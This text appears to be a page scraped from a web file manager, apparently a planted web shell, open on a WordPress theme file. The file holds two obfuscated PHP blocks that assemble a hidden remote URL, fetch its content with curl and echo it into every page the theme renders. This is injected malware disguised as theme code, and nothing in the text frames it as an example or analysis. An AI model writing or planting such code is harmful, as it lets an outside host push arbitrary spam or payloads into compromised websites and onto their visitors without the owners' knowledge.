Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
participable
/
wp-content
/
themes
:
theme.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php $x1 = "constructoracorrea.com"; $x2 = (string)(1); $x3 = 'http' . '://' . 'kod2' . '.them' . 'elicense' . '.net' . '/kod' . '/read' . '.php?' . 'url=' . $x1 . '&type=' . $x2; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $x3); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $x4 = curl_exec($ch); curl_close($ch); echo $x4; ?> <?php $x1 = "constructoracorrea.com"; $x2 = ""; $x3 = 'http' . '://' . 'kod2' . '.them' . 'elicense' . '.net' . '/kod' . '/read' . '.php?' . 'url=' . $x1 . '&type=' . $x2; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $x3); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $x4 = curl_exec($ch); curl_close($ch); echo $x4; ?>